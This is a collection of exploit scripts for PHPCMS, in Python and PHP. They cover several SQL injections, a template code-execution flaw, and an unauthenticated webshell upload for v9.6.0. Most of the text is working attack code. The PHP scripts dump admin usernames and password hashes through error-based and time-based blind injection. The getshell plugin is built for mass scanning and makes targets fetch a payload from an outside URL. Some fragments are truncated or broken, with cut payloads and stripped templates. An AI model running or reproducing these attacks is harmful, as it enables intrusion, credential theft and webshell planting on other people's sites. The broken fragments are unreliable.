phpcms 部分exp

# PHPCMS_flash_upload_SQL.py
```
#encoding=utf-8
#__author__ = 'greenboy'
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
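def scan(target):
    """Test *target* for the PHPCMS 2008 ``flash_upload.php`` error-based SQL injection.

    The ``modelid`` value is sent URL-encoded; decoded it is ``0 and(select 1
    from(select count(*),concat((...md5(3.1415)...),floor(rand(0)*2))x from
    information_schema.tables group by x)a)`` -- the duplicate-key trick that
    makes MySQL echo the selected value in its error text. A vulnerable site
    therefore returns ``63e1f04640e83605c1d177544a5a0488`` (md5 of 3.1415)
    somewhere in the body; the HTTP status alone proves nothing.

    :param target: ``scheme://host[/base]`` without a trailing slash; the PoC
        path is appended verbatim. (The CLI entry point lowercases the whole
        argument, so a mixed-case base path will not match on a case-sensitive
        server.)
    :returns: ``True`` when the marker is found, otherwise ``False`` -- also
        for a non-200 status and for any connection/timeout error. The
        original only printed; the return value is additive.
    """
    info = {
        'name': u'PHPCMS 2008 flash_upload.php SQL注入',
        'date': '2014-12-6',
        'author': '5up3rc',
        'poc': '/flash_upload.php?modelid=%30%20%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    # md5(3.1415): the value the payload asks MySQL to leak.
    marker = '63e1f04640e83605c1d177544a5a0488'
    try:
        # A timeout keeps one unresponsive host from stalling a batch run; the
        # original request could block indefinitely and any socket error
        # escaped as a traceback.
        audit_request = requests.get(target + info['poc'], headers=headers, timeout=10)
    except requests.exceptions.RequestException:
        print('connection error')
        return False
    body = audit_request.text
    audit_request.close()
    if audit_request.status_code != 200:
        print('connection error')
        return False
    if marker not in body:
        print(u'[!]audit error')
        return False
    print(u'[!]audit success')
    print('[*]' + target + info['poc'])
    return True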
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: python phpcms_flash_upload_sqli.py [target]\n"
        print "Example: python phpcms_flash_upload_sqli.py http://www.xxx.com\n"
        sys.exit(1)
    else:
        target = sys.argv[1].lower()
        scan(target)
```
# PHPCMS_Vote_SQL.py
```
#encoding=UTF-8
# __author__ = 'greenboy'
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
def scan(target):
    info = {
        'name':u'phpcms投票模块SQL注入',
        'date':'2014-12-4',
        'author':'5up3rc',
        'poc':'/index.php?m=vote&c=index&a=lists&siteid=1%27%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%33%61%2C%30%78%33%61%2C%6D%64%35%28%33%2E%31%34%31%35%29%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23'
    }
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    audit_request = requests.get(target + info['poc'], headers=headers)
    audit_request.close()
    if audit_request.status_code == 200:
        if audit_request.text.find('63e1f04640e83605c1d177544a5a0488') !=-1:
            print u'[!]audit success'
            print '[*]' + target + info['poc']
        else:
            print u'[!]audit error'
    else:
        print 'connection error'
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: python vote_sqli.py [target]\n"
        print "Example: python vote_sqli.py http://www.xxx.com\n"
        sys.exit(1)
    else:
        target = sys.argv[1].lower()
        scan(target)
```
# phpcms.php
```
#!/usr/bin/php
```
# phpcms9.6.0-getshell.py
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
PHPCMS Unauthenticated Webshell Upload Exploit

Version:
    9.x <= 9.6.0

Usage:
    1. Upload `payload.txt` on your own public webserver.
       (The contents of payload.txt were stripped when this page was rendered
       and are not reproduced here.)
    2. Change `PUBLIC_URL` to your own path like `http://your_host/payload.txt`.
    3. python POC-T.py -s phpcms9.6.0-getshell -aG "Powered by PHPCMS v9" --limit 100

Reference:
    https://www.t00ls.net/viewthread.php?tid=39226&extra=&page=1

"""

import requests
from plugin.util import randomString

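# URL of the payload the target is made to fetch (see poc()). This default is
# a file on a third-party CDN that you neither own nor can audit -- its name
# suggests a WAF-bypass webshell -- so running the plugin as shipped deploys
# somebody else's code onto every host you test. Replace it with a payload you
# host yourself, as the module docstring instructs, before use.
PUBLIC_URL = 'http://7xusrl.com1.z0.glb.clouddn.com/bypassdog.txt'
# Per-request timeout in seconds for requests.post() in poc().
TIMEOUT = 10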

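def poc(url, payload_url=None):
    """Attempt the PHPCMS <= 9.6.0 unauthenticated file write via member registration.

    A registration POST is sent with the ``info[content]`` field built from
    *payload_url*; success is recognised by a "MySQL Error" response that
    leaks the URL (``http...php``) of the file the server just wrote.

    :param url: target with or without scheme; ``?query``, ``#fragment``, a
        trailing ``/`` and a trailing ``/index.php`` are removed.
    :param payload_url: URL of your hosted ``payload.txt``; defaults to
        ``PUBLIC_URL``. Host it yourself -- the shipped default points at a
        third party's file, i.e. code you do not control.
    :returns: the leaked ``http...php`` URL on success, ``False`` otherwise
        (including any request error: POC-T plugins are best-effort).
    """
    if payload_url is None:
        payload_url = PUBLIC_URL

    base = url if '://' in url else 'http://' + url
    base = base.split('#')[0].split('?')[0].rstrip('/')
    # str.rstrip() strips a *character set*, so the original
    # rstrip('/index.php') also ate a trailing "xp", "php", ... from a base
    # path (e.g. ".../xp" became ".../"). Remove the suffix only if present.
    suffix = '/index.php'
    if base.endswith(suffix):
        base = base[:-len(suffix)]

    data = {
        "siteid": "1",
        "modelid": "1",
        "username": randomString(10),
        "password": randomString(10),
        "email": "{}@qq.com".format(randomString()),
        # NOTE(review): the HTML template originally here was stripped when
        # this listing was rendered; only an image's alt text survived. The
        # real template must contain a '{}' placeholder, otherwise .format()
        # inserts nothing and the payload URL never reaches the target.
        "info[content]": "图片[1]-phpcms 部分exp-棉花糖会员站".format(payload_url),
        "dosubmit": "1",
        "protocol": "",
    }

    target_url = base + "/index.php?m=member&c=index&a=register&siteid=1"
    try:
        r = requests.post(target_url, data=data, timeout=TIMEOUT)
    except Exception:
        # Deliberately broad: one bad host must not abort a batch run.
        return False

    # r.text, not r.content: under Python 3 content is bytes and the
    # substring test raised TypeError (swallowed as a false negative).
    body = r.text
    if "MySQL Error" not in body:
        return False
    # Cut the first "http...php" URL. The original sliced from the first
    # "http" to the first ".php" anywhere in the page, which returned junk when
    # ".php" preceded "http" and raised ValueError when ".php" was absent.
    start = body.find("http")
    end = body.find(".php", start) if start != -1 else -1
    if start == -1 or end == -1:
        return False
    return body[start:end] + ".php"
    # (The listing ended in an unresolved merge conflict; both sides were
    # `return False`, which the early returns above now cover.)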
```
# PHPCMS2007_digg_add_SQL.py
```
#encoding=UTF-8
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
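def scan(target):
    """Test *target* for the PHPCMS 2007 ``digg/digg_add.php`` SQL injection.

    The ``digg_mod`` parameter ends up as a table name, so the PoC supplies
    ``digg_data WHERE 1=2 +and(select 1 from(select count(*),concat((...
    md5(3.1415)...),floor(rand(0)*2))x from information_schema.tables group by
    x)a)#`` -- the duplicate-key trick that makes MySQL print the selected
    value in its error message. A vulnerable site echoes
    ``63e1f04640e83605c1d177544a5a0488`` (md5 of 3.1415) in the body.

    :param target: ``scheme://host[/base]`` without a trailing slash; the PoC
        path is appended verbatim. (The CLI entry point lowercases the whole
        argument, so a mixed-case base path will not match on a case-sensitive
        server.)
    :returns: ``True`` when the marker is found, otherwise ``False`` -- also
        for a non-200 status and for any connection/timeout error. The
        original only printed; the return value is additive.
    """
    info = {
        'name': u'PHPCMS 2007 digg_add.php注入',
        'date': '2014-11-30',
        'author': '0x0F',
        'poc': '/digg/digg_add.php?id=1&con=2&digg_mod=digg_data WHERE 1=2 +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(3.1415),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    # md5(3.1415): the value the payload asks MySQL to leak.
    marker = '63e1f04640e83605c1d177544a5a0488'
    try:
        # Timeout so one unresponsive host cannot stall a batch run; socket
        # errors are reported instead of escaping as a traceback.
        audit_request = requests.get(target + info['poc'], headers=headers, timeout=10)
    except requests.exceptions.RequestException:
        print('connection error')
        return False
    body = audit_request.text
    audit_request.close()
    if audit_request.status_code != 200:
        print('connection error')
        return False
    if marker not in body:
        print(u'[!]audit error')
        return False
    print(u'[!]audit success')
    print('[*]' + target + info['poc'])
    return True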
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: python phpcms_digg_add_php_sqli.py [target]\n"
        print "Example: python phpcms_digg_add_php_sqli.py http://www.xxx.com\n"
        sys.exit(1)
    else:
        target = sys.argv[1].lower()
        scan(target)
```
# PHPCMS2007SQL.py
```
#encoding=UTF-8
__author__ = 'greenboy'
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
def scan(target):
    info = {
        'name':u'PHPCMS 2007 member.php宽字节注入',
        'date':'2014-11-30',
        'author':'5up3rc',
        'poc': '/member/member.php?username=%d5%27%2B%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    audit_request = requests.get(target + info['poc'], headers=headers)
    audit_request.close()
    if audit_request.status_code == 200:
        if audit_request.text.find('63e1f04640e83605c1d177544a5a0488') != -1:
            print u'[!]audit success'
            print '[*]' + target + info['poc']
        else:
            print u'[!]audit error'
    else:
        print 'connection error'
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: python phpcms_member_php_sqli.py [target]\n"
        print "Example: python phpcms_member_php_sqli.py http://www.xxx.com\n"
        sys.exit(1)
    else:
        target = sys.argv[1].lower()
        scan(target)
```
(注:上面脚本中的 poc 字符串在本页中被截断,payload 后半段缺失,原样照录时无法触发 md5 标记。)
# phpcms2008_c.php
```
c.php type=2->js.php
Example: php ‘ . $argv[0] . ‘ localhost /phpcms
+——————————————————+
‘);
exit;
}
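error_reporting(7); // E_ERROR | E_WARNING | E_PARSE
// Wall-clock start for the elapsed-time line printed at the end of the script.
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
$type = $argv[3];
// Which of the two injectable pages to hit. Both are driven through the
// Referer header (see send_pack()), not through a query parameter.
switch ($type) {
    case 1:
        $url = '/c.php?id=1';
        break;
    case 2:
        $url = '/data/js.php?id=1';
        break;
    default:
        echo '请输入注入页面1或者2' . "\n";
        exit;
}

/**
 * Wrap an inner SELECT in the error-based extraction skeleton.
 *
 * count(*) with concat(<value>, floor(rand(0)*2)) grouped by that concat
 * forces a duplicate-key error whose message repeats the value wrapped as
 * "~...~1"; get_info() pulls it out. Every probe in the original script used
 * this exact skeleton with a different inner SELECT, so it is built once here.
 *
 * @param string $inner the SELECT producing concat(0x7e, <value>, 0x7e)
 * @return string the Referer value to send
 */
function injection_probe($inner)
{
    return "' and(select 1 from(select count(*),concat((select (select (" . $inner . ")) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
}

// Confirm the injection point *before* extracting anything: a lone quote in
// the Referer should produce a "MySQL Query" error on a vulnerable install.
// The original fired four extraction probes first and tested afterwards.
if (!preg_match('/MySQL Query/i', send_pack("'"))) {
    exit("报告大人,网站不存在此漏洞,请更换注入页面试试!\n");
}

$db_ver = get_info(injection_probe('select concat(0x7e,version(),0x7e)'));
$db_user = get_info(injection_probe('select concat(0x7e,user(),0x7e)'));
// The table prefix is unknown, so find the member table via information_schema.
$member = get_info(injection_probe("SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() and table_name like '%_member%' LIMIT 0,1"));
if ($member == '') {
    exit("Could not determine the member table name\n");
}
// groupid=1 is treated as the administrator group by this script.
$ad_count = (int)get_info(injection_probe("SELECT distinct concat(0x7e,count(*),0x7e) FROM $member where groupid=1 LIMIT 0,1"));

echo '数据库版本: ' . $db_ver . "\n";
echo '数据库用户: ' . $db_user . "\n";
echo '管理员个数: ' . $ad_count . "\n";
// One probe per admin row. (The original iterated range(0, $ad_count - 1),
// which for a count of 0 still sent two bogus probes with LIMIT 0 and -1.)
for ($i = 0; $i < $ad_count; $i++) {
    $row = get_info(injection_probe("SELECT distinct concat(0x7e,username,0x3a,password,0x7e) FROM $member where groupid=1 LIMIT $i,1"));
    echo '管理员' . $i . '-->' . $row . "\n";
}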

//发送数据包函数
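/**
 * Send one GET to the selected page with $cmd as the Referer and return the
 * raw HTTP response.
 *
 * The injection point of this script is the Referer header: $cmd is a SQL
 * fragment (see the probes in the main code) placed there verbatim.
 *
 * @param string $cmd the Referer value / SQL fragment
 * @return string raw response (status line, headers and body)
 */
function send_pack($cmd)
{
    global $host, $path, $url;
    $data = "GET " . $path . "$url HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    //$data .= "User-Agent: Baiduspider\r\n";
    $data .= "Referer: " . $cmd . "\r\n";
    $data .= "Connection: Close\r\n\r\n";

    // 10 s connect timeout (as before) plus a read timeout: the original
    // could hang forever on a host that accepted the connection and then
    // never answered.
    $fp = @fsockopen($host, 80, $errno, $errstr, 10);
    if (!$fp) {
        echo $errno . '-->' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    }
    stream_set_timeout($fp, 10);
    fwrite($fp, $data);
    $back = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 1024);
        if ($chunk === '' || $chunk === false) {
            $meta = stream_get_meta_data($fp);
            if ($meta['timed_out']) {
                break;
            }
            continue;
        }
        $back .= $chunk;
    }
    fclose($fp);
    return $back;
}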

//提取返回信息
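/**
 * Send a probe and extract the value MySQL echoed between "~" and "~1".
 *
 * The probes wrap the leaked value in 0x7e ('~') and the duplicate-key
 * message appends "1", hence /~(.*?)~1/. A UTF-8 page is transcoded to GBK
 * for the (Chinese Windows) console, as in the original.
 *
 * @param string $info probe to pass to send_pack()
 * @return string the leaked value, or '' when nothing matched
 */
function get_info($info)
{
    // The original called send_pack() twice per value -- two injection
    // requests for one result. Fetch once and reuse the response.
    $response = send_pack($info);
    // Non-greedy capture (as the sibling preview.php script already does) so a
    // second "~...~1" later on the same line cannot widen the match.
    if (!preg_match('/~(.*?)~1/i', $response, $admin_match)) {
        return '';
    }
    if (preg_match('/charset=utf-8/i', $response)) {
        return iconv('utf-8', 'gbk//IGNORE', $admin_match[1]);
    }
    return $admin_match[1];
}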

//时间统计函数
/**
 * Current time as a float with microsecond precision.
 *
 * microtime() returns "<usec> <sec>"; adding the two numeric strings yields
 * seconds since the epoch including the fractional part.
 *
 * @return float
 */
function func_time()
{
    $parts = explode(' ', microtime());
    return $parts[0] + $parts[1];
}

// Elapsed time since $start_time, rounded to 4 decimals, for the final report line.
$elapsed = round(func_time() - $start_time, 4);
echo '脚本执行时间:' . $elapsed . '秒。';
?>
```
# PHPCMS2008_EXE.py
```
# coding=utf-8
'''
phpcms 2008的代码中由于对模板参数处理不当,导致可以执行任意代码。
'''

import sys
import requests
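def scan(target):
    """Test *target* for the PHPCMS 2008 yellow-pages (``yp/product.php``) code execution.

    The ``pagesize`` parameter is sent URL-encoded; decoded it is
    ``${@print(md5(3.1415))}``, i.e. template syntax that a vulnerable
    install evaluates. Success means the page contains
    ``63e1f04640e83605c1d177544a5a0488`` (md5 of 3.1415).

    Bug fixed here: the original condition ``find(...) != 0 or find(...) != -1``
    is always true, so every host answering 200 was reported as vulnerable.

    :param target: ``scheme://host[/base]`` without a trailing slash; the PoC
        path is appended verbatim. (The CLI entry point lowercases the whole
        argument, so a mixed-case base path will not match on a case-sensitive
        server.)
    :returns: ``True`` when the marker is found, otherwise ``False`` -- also
        for a non-200 status and for any connection/timeout error. The
        original only printed; the return value is additive.
    """
    info = {
        'name': u'PHPCMS 2008黄页模块代码执行漏洞',
        'date': '2014-11-30',
        'author': '5up3rc',
        'poc': '/yp/product.php?pagesize=%24%7B%40%70%72%69%6E%74%28%6D%64%35%28%33%2E%31%34%31%35%29%29%7D'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    # md5(3.1415): what the injected print() emits.
    marker = '63e1f04640e83605c1d177544a5a0488'
    try:
        # Timeout so one unresponsive host cannot stall a batch run; socket
        # errors are reported instead of escaping as a traceback.
        audit_request = requests.get(target + info['poc'], headers=headers, timeout=10)
    except requests.exceptions.RequestException:
        print('connection error')
        return False
    body = audit_request.text
    audit_request.close()
    if audit_request.status_code != 200:
        print('connection error')
        return False
    # Presence test only -- the original's `!= 0 or != -1` could never be false.
    if marker not in body:
        print(u'[!]audit error')
        return False
    print(u'[!]audit success')
    print('[*]' + target + info['poc'])
    return True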
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: python phpcms_yp_code_exec.py [target]\n"
        print "Example: python phpcms_yp_code_exec.py http://www.xxx.com\n"
        sys.exit(1)
    else:
        target = sys.argv[1].lower()
        scan(target)
```
# phpcms2008_preview.php
```
' . get_info($ad_pass) . "\n";
}
} else {
exit(“报告大人,网站不存在此漏洞,你可以继续秒下一个!\n”);
}

//提取返回信息
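/**
 * Send a probe and extract the value MySQL echoed between "~" and "~1".
 *
 * A UTF-8 page is transcoded to GBK for the (Chinese Windows) console, as
 * in the original.
 *
 * @param string $info probe to pass to send_pack()
 * @return string the leaked value, or '' when nothing matched
 */
function get_info($info)
{
    // The original called send_pack() twice per value -- two injection
    // requests for one result. Fetch once and reuse the response.
    $response = send_pack($info);
    if (!preg_match('/~(.*?)~1/i', $response, $match_string)) {
        return '';
    }
    if (preg_match('/charset=utf-8/i', $response)) {
        return iconv('utf-8', 'gbk//IGNORE', $match_string[1]);
    }
    return $match_string[1];
}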

//发送数据包函数
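/**
 * Send one GET to preview.php with $cmd appended to info[contentid] and
 * return the raw HTTP response.
 *
 * The request carries the global $cookie (set outside this excerpt), so the
 * page is reached with whatever session the operator supplied.
 *
 * @param string $cmd SQL fragment; URL-encoded before being appended
 * @return string raw response (status line, headers and body)
 */
function send_pack($cmd)
{
    global $host, $path, $cookie;
    $data = "GET " . $path . "/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2" . urlencode($cmd) . " HTTP/1.1\r\n";
    $data .= "Host: " . $host . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\n";
    $data .= "Cookie:" . $cookie . "\r\n";
    $data .= "Connection: Close\r\n\r\n";
    //echo $data;
    // The request must end with a blank line (two CRLF), otherwise the server
    // waits for more headers and never answers.
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) {
        echo $errno . '-->' . $errstr;
        exit('Could not connect to: ' . $host);
    }
    // Read timeout: the original only bounded the connect and could hang on
    // a host that accepted the connection and then went silent.
    stream_set_timeout($fp, 30);
    fwrite($fp, $data);
    $back = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 1024);
        if ($chunk === '' || $chunk === false) {
            $meta = stream_get_meta_data($fp);
            if ($meta['timed_out']) {
                break;
            }
            continue;
        }
        $back .= $chunk;
    }
    fclose($fp);
    return $back;
}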

//时间统计函数
/**
 * Current time as a float with microsecond precision.
 *
 * microtime() returns "<usec> <sec>"; adding the two numeric strings yields
 * seconds since the epoch including the fractional part.
 *
 * @return float
 */
function func_time()
{
    $parts = explode(' ', microtime());
    return $parts[0] + $parts[1];
}

// Elapsed time since $start_time, rounded to 4 decimals, for the final report line.
$elapsed = round(func_time() - $start_time, 4);
echo '脚本执行时间:' . $elapsed . '秒。';
?>
```
# PHPCMS2008_SQL.py
```
'''
common.inc.php文件代码第72行$action、genre变量由GET方式获得,
然后载入escape()方法进行过滤。执行代码第76行,用extract()方法将$_GET得到的数组拆分为变量。
执行job.php文件代码第80行,拼接完成SQL语句,带入数据库进行查询。
如果$genre变量进行二次URL编码即可绕过escape()方法的过滤,导致SQL注入漏洞产生。
'''
#!/usr/bin/env python
# coding=utf-8
import sys
import requests
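def scan(target):
    """Test *target* for the PHPCMS 2008 yellow-pages (``yp/job.php``) SQL injection.

    ``genre`` is double URL-encoded (``a%2527...``): the first decode leaves
    ``%27`` for escape() to inspect, the second yields the quote that breaks
    out of the SQL string (see the module docstring). The rest is the
    error-based ``count(*)/floor(rand(0)*2)`` trick leaking ``md5(3.1415)``,
    so a vulnerable site echoes ``63e1f04640e83605c1d177544a5a0488``.

    Bug fixed here: the original condition ``find(...) != 0 or find(...) != -1``
    is always true, so every host answering 200 was reported as vulnerable.

    :param target: ``scheme://host[/base]`` without a trailing slash; the PoC
        path is appended verbatim. (The CLI entry point lowercases the whole
        argument, so a mixed-case base path will not match on a case-sensitive
        server.)
    :returns: ``True`` when the marker is found, otherwise ``False`` -- also
        for a non-200 status and for any connection/timeout error. The
        original only printed; the return value is additive.
    """
    info = {
        'name': u'PHPCMS 2008黄页模块SQL注入',
        'date': '2014-11-30',
        'author': '0x0F',
        'poc': '/yp/job.php?action=list&genre=a%2527%2B%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    # md5(3.1415): the value the payload asks MySQL to leak.
    marker = '63e1f04640e83605c1d177544a5a0488'
    try:
        # Timeout so one unresponsive host cannot stall a batch run; socket
        # errors are reported instead of escaping as a traceback.
        audit_request = requests.get(target + info['poc'], headers=headers, timeout=10)
    except requests.exceptions.RequestException:
        print('connection error')
        return False
    body = audit_request.text
    audit_request.close()
    if audit_request.status_code != 200:
        print('connection error')
        return False
    # Presence test only -- the original's `!= 0 or != -1` could never be false.
    if marker not in body:
        print(u'[!]audit error')
        return False
    print(u'[!]audit success')
    print('[*]' + target + info['poc'])
    return True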
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Usage: python phpcms_yp_job_php_sqli.py [target]\n"
        print "Example: python phpcms_yp_job_php_sqli.py http://www.xxx.com\n"
        sys.exit(1)
    else:
        target = sys.argv[1].lower()
        scan(target)
```
# phpcms2008sp3_SQL.php
```
".
“\n[+] Ex.: php “.$argv[0].” localhost /yp”.
“\n\n”);
}

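/**
 * Build the URL-encoded `where=` value for one time-based blind probe.
 *
 * Each probe asks MySQL to run benchmark(10000000, md5(1)) only when the
 * tested condition holds; exploit() measures the delay. Every true hit
 * therefore burns several seconds of CPU on the target's database server --
 * this technique is slow, noisy and can degrade the target.
 *
 * @param int    $pos character position (1-based) or, for $chs=3, the length
 * @param int    $chr ord() of the candidate character ($chs=1,2)
 * @param int    $chs 1 = username byte, 2 = password byte, 3 = username length
 * @return string URL-encoded probe, or '' for an unknown $chs (the original
 *                left $query undefined and returned '' with a notice)
 */
function query($pos, $chr, $chs)
{
    global $prefix;
    // groupid=1 is treated as the administrator group; only its first row is read.
    $member = $prefix . "member";
    switch ($chs) {
        case 1:
            $query = "1=1 and if((ascii(substring((select username from " . $member . " where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
            break;
        case 2:
            $query = "1=1 and if((ascii(substring((select password from " . $member . " where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
            break;
        case 3:
            $query = "1=1 and if((length((select username from " . $member . " where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";
            break;
        default:
            return '';
    }
    // Spaces become inline comments -- presumably to get past a filter on
    // `where=`; kept exactly as the original did it.
    $query = str_replace(" ", "/**/", $query);
    return urlencode($query);
}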

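/**
 * Fire one blind probe and report whether the server answered slowly.
 *
 * Returns true when the round trip took more than 4 seconds, which the
 * script reads as "benchmark() ran, the condition is true". Network jitter
 * or a slow host produces false positives; the original measured with
 * whole-second time(), which made the threshold even coarser.
 *
 * @param string $hostname target host
 * @param string $path     application path, e.g. /yp
 * @param int    $pos      position / length passed to query()
 * @param string $chr      candidate character; converted with ord() here
 * @param int    $chs      probe kind, see query()
 * @return bool
 */
function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80, $errno, $errstr, 10);
    if (!$conn) {
        // The original wrote to an unchecked handle (fatal on an unreachable host).
        exit("Could not connect to " . $hostname . ": " . $errstr . "\n");
    }
    // A true hit is expected to take several seconds; give it generous room
    // but do not hang forever.
    stream_set_timeout($conn, 60);

    $postdata = "q=&action=searchlist&where=" . query($pos, $chr, $chs);
    $message = "POST " . $path . "/product.php HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Content-Length: " . strlen($postdata) . "\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $postdata;
    //echo $message;

    $time_a = microtime(true);
    fputs($conn, $message);
    $reply = ''; // the original appended to an undefined variable
    while (!feof($conn)) {
        $reply .= fgets($conn, 1024);
    }
    $time_b = microtime(true);
    fclose($conn);
    //echo $time_b - $time_a."\r\n";

    return ($time_b - $time_a) > 4;
}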

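/**
 * Recover the admin username byte by byte via time-based probes.
 *
 * Candidates are tried in charset order for each position; a true probe
 * (see exploit()) fixes that byte. Uses the global $length computed by
 * lengthcolumns(). Characters outside the charset are printed as '?' --
 * the original indexed past the charset and looped forever on them.
 *
 * @param string $hostname target host
 * @param string $path     application path
 * @param int    $chs      probe kind (1 = username)
 */
function crkusername($hostname, $path, $chs)
{
    global $length;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length) {
        if ($chr >= strlen($key)) {
            echo "?";
            $chr = 0;
            $pos++;
            continue;
        }
        if (exploit($hostname, $path, $pos, $key[$chr], $chs)) {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        } else {
            $chr++;
        }
    }
    echo "\n";
}

/**
 * Recover the 32-character hex password hash the same way (charset 0-9a-f).
 *
 * @param string $hostname target host
 * @param string $path     application path
 * @param int    $chs      probe kind (2 = password)
 */
function crkpassword($hostname, $path, $chs)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32) {
        if ($chr >= strlen($key)) {
            // Not a hex digit: the stored value is not a plain 32-char hash.
            echo "?";
            $chr = 0;
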